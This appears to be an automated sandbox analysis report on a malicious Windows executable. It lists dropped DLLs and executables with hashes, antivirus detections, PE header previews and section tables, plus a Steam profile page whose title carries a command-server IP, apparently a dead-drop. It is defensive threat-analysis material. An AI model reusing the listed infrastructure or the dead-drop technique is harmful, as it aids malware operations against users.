                                                            SHA-512:C3CA54185E54CDB21BF73223520B32F28A5813D748DE91265330D90A63A89AF961F3F840CE8D0D3452DBCF4A2977D1A23D16451A65D24F5C6B87D5F9404AFF16
                                                            Malicious:false
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3063), with CRLF, LF line terminators
                                                            Category:dropped
                                                            Size (bytes):35672
                                                            Entropy (8bit):5.380146966634901
                                                            Encrypted:false
                                                            SSDEEP:768:q7pqLtWYmwt5D0gqOSiNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2S5:q78LtWYmwt5D0gqOSc7PzzgiJmDzJtx1
                                                            MD5:7B0EEDEC48F503315B5CF087431E0D0F
                                                            SHA1:4E7974CED987745BEC806059487A9FAEBF8316A2
                                                            SHA-256:5F0DFC751086A00F2A6FEE6BF23BECF777AFDE0FAD352CC27D746EB6AE5D7288
                                                            SHA-512:09E0E80CC504878E3661E110FFB41114F04F580A126349042FEBCBD576CBDE547E43267AB101E54467AF4B76F168C1A506B24A1BB63E8F84464DC35B6C0E2D20
                                                            Malicious:false
                                                            Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://37.27.34.12|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.css?
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):685392
                                                            Entropy (8bit):6.872871740790978
                                                            Encrypted:false
                                                            SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                            MD5:550686C0EE48C386DFCB40199BD076AC
                                                            SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                            SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                            SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):608080
                                                            Entropy (8bit):6.833616094889818
                                                            Encrypted:false
                                                            SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                            MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                            SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                            SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                            SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):450024
                                                            Entropy (8bit):6.673992339875127
                                                            Encrypted:false
                                                            SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                            MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                            SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                            SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                            SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2046288
                                                            Entropy (8bit):6.787733948558952
                                                            Encrypted:false
                                                            SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                            MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                            SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                            SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                            SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):257872
                                                            Entropy (8bit):6.727482641240852
                                                            Encrypted:false
                                                            SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                            MD5:4E52D739C324DB8225BD9AB2695F262F
                                                            SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                            SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                            SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):80880
                                                            Entropy (8bit):6.920480786566406
                                                            Encrypted:false
                                                            SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                            MD5:A37EE36B536409056A86F50E67777DD7
                                                            SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                            SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                            SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                            Malicious:false
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):2459136
                                                            Entropy (8bit):6.052474106868353
                                                            Encrypted:false
                                                            SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                            MD5:90E744829865D57082A7F452EDC90DE5
                                                            SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                            SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                            SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):325120
                                                            Entropy (8bit):7.384635086921583
                                                            Encrypted:false
                                                            SSDEEP:6144:aKhKQnUA3eyGQ8B5Cckma/ntmfbQaKLtFng7pZ40:/KQUsGQ8B5E/gUhLcdq0
                                                            MD5:EA9DD1EAE2E521666D3F06382104EC10
                                                            SHA1:46E89AFEB61C1D0852412480EE202D48C7D5ACEB
                                                            SHA-256:472785C4ADDBA719D551E2C3AFD1C94AE46140331EB0A50F3EAAE2E0D6C659A9
                                                            SHA-512:1C52E89D2918DFC05C4C31FC14602637C1A1989E7012ECA616316B12C1BC07291BBCA905E3DFDFDBE7D54DE894AC84AD28180753E92167B4038CF6F0E09D7D61
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........[7..:Y.:Y.:Y.h..:Y.h...:Y.h..:Y.B..:Y.:X..:Y.1...:Y.h..:Y.1...:Y.Rich.:Y.........................PE..L......c.....................t.......=....... ....@.................................p..........................................d...................................H................................x..@............ ..d............................text...3........................... ..`.rdata...l... ...n..................@..@.data....F...........~..............@....rsrc................L..............@..@................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:modified
                                                            Size (bytes):1986560
                                                            Entropy (8bit):6.829344277409385
                                                            Encrypted:false
                                                            SSDEEP:49152:CdKfTn6vGJtTF+TxMoxc1TU+j+dAzGwlrh:CdKfTnltIuoITsdZ
                                                            MD5:2095273C7B526065D7094738AA070E1B
                                                            SHA1:6C5A76DD98D42BF2245A249DF4CE32B82AA7A9D3
                                                            SHA-256:F3982D6E94DF1A27ABA2B6D04EAAE994A3C806932D8ECB9AD29287AA499E8B28
                                                            SHA-512:1A56CA6F0C8B4FA5C55AE5048B42A74FE808FEEE102BD9CBC65184A70DAE81127196BA363A50907C11814C749533639A4ACE850910A9420A2F2EBC221B762E8A
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................@...........M.......P....@..............................................@...............................!.......&......................t...................................................................................CODE....H>.......@.................. ..`DATA....D)...P...*...D..............@...BSS..................n...................idata...!......."...n..............@....tls.....................................rdata..............................@..P.reloc..t...........................@..P.rsrc....&.......&...*..............@..P.....................P..............@..P........................................................................................................................................
                                                            Process:C:\Users\user\AppData\Local\Temp\EE6.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):881664
                                                            Entropy (8bit):6.555251818096116
                                                            Encrypted:false
                                                            SSDEEP:24576:o0ESdQpglO1CxDyawn27h+9hrlgKQY9SGcZwCdTp:o0RIglO1CuL9VNcaCd9
                                                            MD5:66064DBDB70A5EB15EBF3BF65ABA254B
                                                            SHA1:0284FD320F99F62ACA800FB1251EFF4C31EC4ED7
                                                            SHA-256:6A94DBDA2DD1EDCFF2331061D65E1BAF09D4861CC7BA590C5EC754F3AC96A795
                                                            SHA-512:B05C6C09AE7372C381FBA591C3CB13A69A2451B9D38DA1A95AAC89413D7438083475D06796ACB5440CD6EC65B030C9FA6CBDAA0D2FE91A926BAE6499C360F17F
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                            Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*............................0.............@..............................................@..............................2'...........................@..p............................0......................................................CODE....d........................... ..`DATA................................@...BSS......................................idata..2'.......(..................@....tls......... ...........................rdata.......0......................@..P.reloc..p....@......................@..P.rsrc...............................@..P.....................t..............@..P........................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):247296
                                                            Entropy (8bit):5.745908027977852
                                                            Encrypted:false
                                                            SSDEEP:3072:YfyeMIAMR7SdybsfrNzUUStydjJ5byzzgrLuj:Yf4MRmworZTStydja3+LM
                                                            MD5:C5261E67BD6D58771E27D7214E8F1C8F
                                                            SHA1:6FD857B3EBDB3888785D41F20277BC4E045BF704
                                                            SHA-256:09D1EBA82060A4FF75575B471D563A5E02485E0AAA3AFE743802A50D6E987410
                                                            SHA-512:CB14F7849F1552EF965C5EE0A2DCE2B860452A00C17EACB450A4C7CAD6EB991F6BAB2B3182352BEF134867D6E164769DF1A3B113A3A4BC3618C38B682CD5F83F
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 29%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO...O..sO...O..sO...O..sO...O..sO.J.O..sO..rO..sO...O..sO...O..sO...O..sORich..sO........PE..L....,Rd....................."......*!............@.................................J].......................................<..(........i..............................................................................l............................text............................... ..`.rdata...t.......v..................@..@.data........P...0...,..............@....rsrc....i.......j...\..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\explorer.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                            Entropy (8bit):5.745908027977852
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:xvJv1BpknZ.exe
                                                            File size:247'296 bytes
                                                            MD5:c5261e67bd6d58771e27d7214e8f1c8f
                                                            SHA1:6fd857b3ebdb3888785d41f20277bc4e045bf704
                                                            SHA256:09d1eba82060a4ff75575b471d563a5e02485e0aaa3afe743802a50d6e987410
                                                            SHA512:cb14f7849f1552ef965c5ee0a2dce2b860452a00c17eacb450a4c7cad6eb991f6bab2b3182352bef134867d6e164769df1a3b113a3a4bc3618c38b682cd5f83f
                                                            SSDEEP:3072:YfyeMIAMR7SdybsfrNzUUStydjJ5byzzgrLuj:Yf4MRmworZTStydja3+LM
                                                            TLSH:5C346C0372E0BD51E966C6329EEEE2F87A1EF5508E59F36E22185A2F0471072C36F751
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............sO..sO..sO...O..sO...O..sO...O..sO...O..sO.J.O..sO..rO..sO...O..sO...O..sO...O..sORich..sO........PE..L....,Rd...........
                                                            Icon Hash:1b2b252529170f17
                                                            Entrypoint:0x40212a
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x64522CE0 [Wed May 3 09:44:00 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:5
                                                            OS Version Minor:0
                                                            File Version Major:5
                                                            File Version Minor:0
                                                            Subsystem Version Major:5
                                                            Subsystem Version Minor:0
                                                            Import Hash:685f8d2b72817b55d930686b099b647b
                                                            Instruction
                                                            call 00007F2FD515F556h
                                                            jmp 00007F2FD515B59Dh
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            int3
                                                            mov ecx, dword ptr [esp+04h]
                                                            test ecx, 00000003h
                                                            je 00007F2FD515B746h
                                                            mov al, byte ptr [ecx]
                                                            add ecx, 01h
                                                            test al, al
                                                            je 00007F2FD515B770h
                                                            test ecx, 00000003h
                                                            jne 00007F2FD515B711h
                                                            add eax, 00000000h
                                                            lea esp, dword ptr [esp+00000000h]
                                                            lea esp, dword ptr [esp+00000000h]
                                                            mov eax, dword ptr [ecx]
                                                            mov edx, 7EFEFEFFh
                                                            add edx, eax
                                                            xor eax, FFFFFFFFh
                                                            xor eax, edx
                                                            add ecx, 04h
                                                            test eax, 81010100h
                                                            je 00007F2FD515B70Ah
                                                            mov eax, dword ptr [ecx-04h]
                                                            test al, al
                                                            je 00007F2FD515B754h
                                                            test ah, ah
                                                            je 00007F2FD515B746h
                                                            test eax, 00FF0000h
                                                            je 00007F2FD515B735h
                                                            test eax, FF000000h
                                                            je 00007F2FD515B724h
                                                            jmp 00007F2FD515B6EFh
                                                            lea eax, dword ptr [ecx-01h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            lea eax, dword ptr [ecx-02h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            lea eax, dword ptr [ecx-03h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            lea eax, dword ptr [ecx-04h]
                                                            mov ecx, dword ptr [esp+04h]
                                                            sub eax, ecx
                                                            ret
                                                            mov edi, edi
                                                            push ebp
                                                            mov ebp, esp
                                                            sub esp, 20h
                                                            mov eax, dword ptr [ebp+08h]
                                                            push esi
                                                            push edi
                                                            push 00000008h
                                                            pop ecx
                                                            mov esi, 0040D230h
                                                            lea edi, dword ptr [ebp-20h]
                                                            rep movsd
                                                            mov dword ptr [ebp-08h], eax
                                                            mov eax, dword ptr [ebp+0Ch]
                                                            pop edi
                                                            mov dword ptr [ebp-04h], eax
                                                            pop esi
                                                            test eax, eax
                                                            Programming Language:
                                                            • [ASM] VS2008 build 21022
                                                            • [ C ] VS2008 build 21022
                                                            • [C++] VS2008 build 21022
                                                            • [IMP] VS2005 build 50727
                                                            • [RES] VS2008 build 21022
                                                            • [LNK] VS2008 build 21022
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x23c9c | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1b71000 | 0x169d0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0xd000 | 0x16c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xb1ad | 0xb200 | 30d1dbbfc25912c04703cb05e6e51a5e | False | 0.613939606741573 | data | 6.580117479602431 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xd000 | 0x174d4 | 0x17600 | 428e17fcd8a02e1a310cdd97f7ec427b | False | 0.6072025401069518 | data | 5.990184385845487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x25000 | 0x1b4bea8 | 0x3000 | 9008a17250967990915b873cda3f667e | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1b71000 | 0x169d0 | 0x16a00 | c45d1674ab923dfc86c77d975da15b74 | False | 0.3851864640883978 | data | 4.379549373991237 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_CURSOR | 0x1b85180 | 0x130 | Device independent bitmap graphic, 32 x 64 x 1, image size 0 | | | 0.4276315789473684
RT_CURSOR | 0x1b852c8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | | | 0.31023454157782515
RT_ICON | 0x1b718b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.3370075046904315
RT_ICON | 0x1b72970 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.3829957356076759
RT_ICON | 0x1b73818 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.4851083032490975
RT_ICON | 0x1b740c0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.5345622119815668
RT_ICON | 0x1b74788 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.5751445086705202
RT_ICON | 0x1b74cf0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkish | Turkey | 0.4175311203319502
RT_ICON | 0x1b77298 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | Turkish | Turkey | 0.43105065666041276
RT_ICON | 0x1b78340 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.4819672131147541
RT_ICON | 0x1b78cc8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.49113475177304966
RT_ICON | 0x1b791a8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | Turkish | Turkey | 0.35581023454157784
RT_ICON | 0x1b7a050 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | Turkish | Turkey | 0.44314079422382674
RT_ICON | 0x1b7a8f8 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 0 | Turkish | Turkey | 0.45852534562211983
RT_ICON | 0x1b7afc0 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | Turkish | Turkey | 0.4682080924855491
RT_ICON | 0x1b7b528 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | Turkish | Turkey | 0.31182572614107884
RT_ICON | 0x1b7dad0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 0 | Turkish | Turkey | 0.3614754098360656
RT_ICON | 0x1b7e458 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | Turkish | Turkey | 0.3874113475177305
RT_ICON | 0x1b7e928 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | Turkish | Turkey | 0.37100213219616207
RT_ICON | 0x1b7f7d0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | Turkish | Turkey | 0.46525270758122744
RT_ICON | 0x1b80078 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Turkish | Turkey | 0.47119815668202764
RT_ICON | 0x1b80740 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | Turkish | Turkey | 0.5057803468208093
RT_ICON | 0x1b80ca8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | Turkish | Turkey | 0.26524896265560166
RT_ICON | 0x1b83250 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | Turkish | Turkey | 0.2879924953095685
RT_ICON | 0x1b842f8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | Turkish | Turkey | 0.31721311475409836
RT_ICON | 0x1b84c80 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | Turkish | Turkey | 0.3448581560283688
RT_DIALOG | 0x1b86370 | 0xac | data | | | 0.7151162790697675
RT_STRING | 0x1b86420 | 0xea | data | | | 0.5256410256410257
RT_STRING | 0x1b86510 | 0x4c2 | data | | | 0.4490968801313629
RT_STRING | 0x1b869d8 | 0x1a8 | data | | | 0.5023584905660378
RT_STRING | 0x1b86b80 | 0x162 | data | | | 0.5084745762711864
RT_STRING | 0x1b86ce8 | 0x69e | data | | | 0.4279811097992916
RT_STRING | 0x1b87388 | 0x45c | data | | | 0.46236559139784944
RT_STRING | 0x1b877e8 | 0x1e4 | data | | | 0.48140495867768596
RT_ACCELERATOR | 0x1b85160 | 0x20 | data | | | 1.15625
RT_GROUP_CURSOR | 0x1b852b0 | 0x14 | data | | | 1.15
RT_GROUP_CURSOR | 0x1b86170 | 0x14 | data | | | 1.25
RT_GROUP_ICON | 0x1b79130 | 0x76 | data | Turkish | Turkey | 0.6694915254237288
RT_GROUP_ICON | 0x1b7e8c0 | 0x68 | data | Turkish | Turkey | 0.7019230769230769
